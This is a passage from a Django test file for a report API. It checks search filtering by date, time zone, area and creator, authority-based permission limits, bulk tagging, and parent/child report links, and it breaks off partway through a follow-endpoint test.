    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_search_results_only_have_permission_on_administration_area(self):
    """Searching by an administration area of another authority yields no results."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'administrationArea:%s' % self.area3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_search_results_only_have_permission_on_administration_area_with_authority(self):
    """A second member of the authority also gets no results for a foreign area."""
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search'),
                           {'q': 'administrationArea:%s' % self.area3.id})
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 0)
def test_api_report_search_will_always_return_report_type_0(self):
    """Reports of the built-in positive type (id=0) always appear in search results."""
    positive_type = ReportType.objects.get(id=0)  # guaranteed by setUp
    factory.create_report(type=positive_type, administration_area=self.area1,
                          negative=False)
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search'))
    self.assertEqual(resp.status_code, 200)
    self.assertEqual(json.loads(resp.content)['count'], 4)
# NOTE(review): the test below is deliberately disabled by wrapping it in a bare
# triple-quoted string, even though its non-authority twin above is active.
# Confirm why it was disabled before re-enabling.
'''
def test_api_report_search_will_always_return_report_type_0_with_authority(self):
try:
default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
'''
def test_api_report_search_date_today(self):
    """'date: today' matches only reports dated within the current day."""
    today = datetime.date.today()
    tomorrow = today + datetime.timedelta(days=1)
    yesterday = today - datetime.timedelta(days=1)
    todays_report = factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(today, datetime.time(0, 0)))
    # Boundary reports just outside today must not match.
    factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(tomorrow, datetime.time(0, 0)))
    factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(yesterday, datetime.time(23, 59)))
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: today')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], todays_report.id)
def test_api_report_search_date_today_with_authority(self):
    """'date: today' behaves identically for another member of the authority."""
    today = datetime.date.today()
    tomorrow = today + datetime.timedelta(days=1)
    yesterday = today - datetime.timedelta(days=1)
    todays_report = factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(today, datetime.time(0, 0)))
    factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(tomorrow, datetime.time(0, 0)))
    factory.create_report(
        type=self.type1, administration_area=self.area1,
        date=datetime.datetime.combine(yesterday, datetime.time(23, 59)))
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: today')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], todays_report.id)
def test_api_report_search_date_yesterday(self):
    """'date: yesterday' matches a report dated one day before now."""
    one_day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    target = factory.create_report(type=self.type1, administration_area=self.area1,
                                   date=one_day_ago)
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: yesterday')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], target.id)
def test_api_report_search_date_yesterday_with_authority(self):
    """'date: yesterday' behaves identically for another member of the authority."""
    one_day_ago = datetime.datetime.now() - datetime.timedelta(days=1)
    target = factory.create_report(type=self.type1, administration_area=self.area1,
                                   date=one_day_ago)
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: yesterday')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], target.id)
def test_api_report_search_date_this_week(self):
    """'date: this week' matches a report dated now."""
    target = factory.create_report(type=self.type1, administration_area=self.area1,
                                   date=datetime.datetime.now())
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: this week')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], target.id)
def test_api_report_search_date_this_week_with_authority(self):
    """'date: this week' behaves identically for another member of the authority."""
    target = factory.create_report(type=self.type1, administration_area=self.area1,
                                   date=datetime.datetime.now())
    self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.yoona.auth_token.key)
    resp = self.client.get(reverse('reports_search') + '?q=date: this week')
    self.assertEqual(resp.status_code, 200)
    body = json.loads(resp.content)
    self.assertEqual(body['count'], 1)
    self.assertEqual(body['results'][0]['id'], target.id)
def test_api_report_search_last_7_days(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_last_7_days_with_authority(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_last_10_days(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 10 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], report10.id)
def test_api_report_search_last_10_days_with_authority(self):
last7days = datetime.datetime.now() - datetime.timedelta(days=7)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=last7days)
last10days = datetime.datetime.now() - datetime.timedelta(days=10)
report10 = factory.create_report(type=self.type1, administration_area=self.area1,
date=last10days)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: last 10 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], report10.id)
def test_api_report_search_date_today_timezone(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
report_today = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(20, 0)))
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_yesterday.id)
def test_api_report_search_date_today_timezone_with_authority(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
report_today = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(today, datetime.time(20, 0)))
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: today')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_yesterday.id)
def test_api_report_search_date_yesterday_timezone(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
last_2_day = today - datetime.timedelta(days=2)
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
report_2_days_ago = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last_2_day, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_2_days_ago.id)
def test_api_report_search_date_yesterday_timezone_with_authority(self):
today = datetime.date.today()
yesterday = today - datetime.timedelta(days=1)
last_2_day = today - datetime.timedelta(days=2)
report_yesterday = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(yesterday, datetime.time(20, 0)))
report_2_days_ago = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last_2_day, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: yesterday')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_2_days_ago.id)
def test_api_report_search_date_this_week_timezone(self):
today = datetime.date.today()
week_start = today - datetime.timedelta(days=today.weekday())
before_week_start = week_start - datetime.timedelta(days=1)
report_before_week_start = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(before_week_start, datetime.time(22, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_before_week_start.id)
def test_api_report_search_date_this_week_timezone_with_authority(self):
today = datetime.date.today()
week_start = today - datetime.timedelta(days=today.weekday())
before_week_start = week_start - datetime.timedelta(days=1)
report_before_week_start = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(before_week_start, datetime.time(22, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: this week')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report_before_week_start.id)
def test_api_report_search_date_last_7_days_timezone(self):
today = datetime.date.today()
last8days = today - datetime.timedelta(days=8)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last8days, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_last_7_days_timezone_with_authority(self):
today = datetime.date.today()
last8days = today - datetime.timedelta(days=8)
report = factory.create_report(type=self.type1, administration_area=self.area1,
date=datetime.datetime.combine(last8days, datetime.time(20, 0)))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: last 7 days')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], report.id)
def test_api_report_search_date_date_range(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_timezone(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_date_range_timezone_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09 TO 2014-11-11]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_search_date_datetime_range_timezone(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
def test_api_report_search_date_datetime_range_timezone_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?tz=7&q=date: [2014-11-09T12:00 TO 2014-11-11T15:00]')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
def test_api_report_search_area_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=area: %s' % self.area1.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_area_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=area: %s' % self.area1.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_search_report_type_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=typeName: %s' % self.type2.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_report_type_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=typeName: %s' % self.type2.name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_search_report_created_by_name(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.first_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.last_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.taeyeon.get_full_name())
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
def test_api_report_search_report_created_by_name_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.first_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.jessica.last_name)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report3.id)
response = self.client.get(reverse('reports_search') + '?q=createdByName: %s' % self.taeyeon.get_full_name())
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
def test_anonymous_cannot_access_api_list_search(self):
response = self.client.get(reverse('reports_search'))
self.assertEqual(response.status_code, 401)
class TestApiReportTags(APITestCase):
    """Tests for the bulk add-tags endpoint ('add_reports_tags')."""

    def setUp(self):
        call_command('clear_index', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.type = factory.create_report_type(authority=self.authority)
        self.area = factory.create_administration_area(authority=self.authority)
        self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type,
            administration_area=self.area, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
        self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type,
            administration_area=self.area, date=datetime.datetime(2014, 11, 11, 12, 30, 45))

    def _login(self):
        # Authenticate subsequent client requests as taeyeon.
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.taeyeon.auth_token.key)

    def _assert_report_has_tags(self, report_id, tag_names):
        # Reload the report and check every expected tag name is attached.
        report = Report.objects.get(id=report_id)
        attached = report.tags.values_list('name', flat=True)
        for tag_name in tag_names:
            self.assertTrue(tag_name in attached)

    def test_anonymous_cannot_access_api_post_report_tags(self):
        response = self.client.post(reverse('add_reports_tags'), {})
        self.assertEqual(response.status_code, 401)

    def test_cannot_post_report_tags_without_data(self):
        self._login()
        response = self.client.post(reverse('add_reports_tags'), {})
        self.assertEqual(response.status_code, 400)

    def test_cannot_post_report_tags_without_report_ids(self):
        self._login()
        params = {
            'tags': [
                {'text': 'test'},
            ],
        }
        response = self.client.post(reverse('add_reports_tags'), params)
        self.assertEqual(response.status_code, 400)

    def test_cannot_post_report_tags_without_tags(self):
        self._login()
        params = {
            'reportIds': [self.report1.id, self.report2.id]
        }
        response = self.client.post(reverse('add_reports_tags'), params)
        self.assertEqual(response.status_code, 400)

    # Renamed from test_cannot_post_report_tags: the test asserts a SUCCESSFUL
    # (200) post that attaches the tag, so the old "cannot" name was misleading.
    def test_can_post_report_tags(self):
        self._login()
        params = {
            'reportIds': [self.report1.id, self.report2.id],
            'tags': [
                {'text': 'test'},
            ],
        }
        response = self.client.post(reverse('add_reports_tags'), params)
        self.assertEqual(response.status_code, 200)
        self._assert_report_has_tags(self.report1.id, ['test'])
        self._assert_report_has_tags(self.report2.id, ['test'])

    # Renamed from test_cannot_post_report_multiple_tags for the same reason:
    # it asserts that posting several tags to several reports succeeds.
    def test_can_post_report_multiple_tags(self):
        self._login()
        params = {
            'reportIds': [self.report1.id, self.report2.id],
            'tags': [
                {'text': 'test1'},
                {'text': 'test2'},
                {'text': 'test3'},
            ],
        }
        response = self.client.post(reverse('add_reports_tags'), params)
        self.assertEqual(response.status_code, 200)
        self._assert_report_has_tags(self.report1.id, ['test1', 'test2', 'test3'])
        self._assert_report_has_tags(self.report2.id, ['test1', 'test2', 'test3'])
class TestApiReportInvolved(APITestCase):
    """Tests for the 'report-involved' endpoint, which lists the reports
    linked to a given report through its parent/child relationship."""

    def setUp(self):
        # The special "positive" report type (id=0) must exist for report creation.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('clear_index', interactive=False, verbosity=0)
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.yoona)
        self.type1 = factory.create_report_type(authority=self.authority)
        self.type2 = factory.create_report_type(authority=self.authority)
        self.type3 = factory.create_report_type()
        self.area1 = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority)
        self.area3 = factory.create_administration_area()
        # report1 is the parent; report2 and report3 are its children.
        self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
            administration_area=self.area1, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
        self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
            administration_area=self.area1, parent=self.report1,
            date=datetime.datetime(2014, 11, 9, 12, 30, 45))
        self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
            administration_area=self.area1, parent=self.report1,
            date=datetime.datetime(2014, 11, 11, 13, 30, 45))
        # Reports the authority users have no permission on (foreign type / area).
        self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
        self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)

    def _get_involved(self, user, report):
        # Authenticate as `user` and GET the involved list for `report`.
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + user.auth_token.key)
        return self.client.get(reverse('report-involved', args=[report.id]))

    def _assert_involved_item(self, item, report):
        # Compare one serialized entry of the involved list against a Report.
        self.assertEqual(item['id'], report.id)
        self.assertEqual(item['reportId'], report.report_id)
        self.assertEqual(item['guid'], report.guid)
        self.assertEqual(item['reportTypeId'], report.type.id)
        self.assertEqual(item['administrationAreaId'], report.administration_area.id)
        self.assertEqual(item['negative'], report.negative)
        self.assertEqual(item['createdByName'], report.created_by.get_full_name())
        self.assertEqual(item['date'], report.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
        self.assertEqual(item['incidentDate'], report.incident_date.strftime('%Y-%m-%d'))

    def test_api_report_involved_that_report_is_parent(self):
        """Querying the parent lists both children, newest first."""
        response = self._get_involved(self.taeyeon, self.report1)
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        self._assert_involved_item(response_json[0], self.report3)
        self._assert_involved_item(response_json[1], self.report2)

    def test_api_report_involved_that_report_is_parent_with_authority(self):
        """An authority member querying the parent sees both children."""
        response = self._get_involved(self.yoona, self.report1)
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        self._assert_involved_item(response_json[0], self.report3)
        self._assert_involved_item(response_json[1], self.report2)

    def test_api_report_involved_that_report_is_child(self):
        """Querying a child lists its sibling and its parent."""
        response = self._get_involved(self.taeyeon, self.report2)
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        self._assert_involved_item(response_json[0], self.report3)
        self._assert_involved_item(response_json[1], self.report1)

    def test_api_report_involved_that_report_is_child_with_authority(self):
        """An authority member querying a child sees its sibling and parent."""
        response = self._get_involved(self.yoona, self.report2)
        self.assertEqual(response.status_code, 200)
        response_json = json.loads(response.content)
        self.assertEqual(len(response_json), 2)
        self._assert_involved_item(response_json[0], self.report3)
        self._assert_involved_item(response_json[1], self.report1)

    def test_api_report_involved_results_only_have_permission_on_report_type(self):
        """A report of a type outside the user's authority is forbidden."""
        response = self._get_involved(self.taeyeon, self.report4)
        self.assertEqual(response.status_code, 403)

    def test_api_report_involved_results_only_have_permission_on_administration_area(self):
        """A report in an area outside the user's authority is forbidden."""
        response = self._get_involved(self.taeyeon, self.report5)
        self.assertEqual(response.status_code, 403)

    # Renamed from test_anonymous_cannot_access_api_list_reports: the request
    # hits the report-involved endpoint, not a report-list endpoint.
    def test_anonymous_cannot_access_api_report_involved(self):
        response = self.client.get(reverse('report-involved', args=[self.report1.id]))
        self.assertEqual(response.status_code, 401)
class TestApiReportFollow(APITestCase):
    """Tests for POST 'report-follow': attach a parent to a report and
    record the follow-up as a ReportComment plus a PRIORITY_FOLLOW Flag."""

    def setUp(self):
        # Ensure the special "positive" report type (id=0) exists; it is
        # created on demand so repeated test runs do not collide.
        try:
            ReportType.objects.get(id=0)
        except ReportType.DoesNotExist:
            ReportType.objects.create(
                id=0,
                name='Positive Report Type',
                form_definition='{}',
                version=0,
            )
        call_command('clear_index', interactive=False, verbosity=0)
        # taeyeon and yoona belong to self.authority; jessica does not.
        self.taeyeon = factory.create_user()
        self.jessica = factory.create_user()
        self.yoona = factory.create_user()
        self.authority = factory.create_authority()
        self.authority.users.add(self.taeyeon)
        self.authority.users.add(self.yoona)
        self.type1 = factory.create_report_type(authority=self.authority)
        self.type2 = factory.create_report_type(authority=self.authority)
        # type3/area3 are outside the authority: used to provoke 403s.
        self.type3 = factory.create_report_type()
        self.area1 = factory.create_administration_area(authority=self.authority)
        self.area2 = factory.create_administration_area(authority=self.authority)
        self.area3 = factory.create_administration_area()
        self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
            administration_area=self.area1, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
        self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
            administration_area=self.area1, date=datetime.datetime(2014, 11, 9, 12, 30, 45))
        self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
            administration_area=self.area1, date=datetime.datetime(2014, 11, 11, 13, 30, 45))
        self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
        self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)

    def test_api_post_report_follow(self):
        """Following sets report1.parent and creates a comment + follow flag
        owned by the requesting user."""
        self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
        params = {
            'parent': self.report2.id
        }
        response = self.client.post(reverse('report-follow', args=[self.report1.id]), params)
        self.assertEqual(response.status_code, 200)
        report1 = Report.objects.get(id=self.report1.id)
        self.assertEqual(report1.parent, self.report2)
        # CHECK CREATE REPORT COMMENT FLAG
        comment = ReportComment.objects.latest('id')
        self.assertEqual(comment.report, report1)
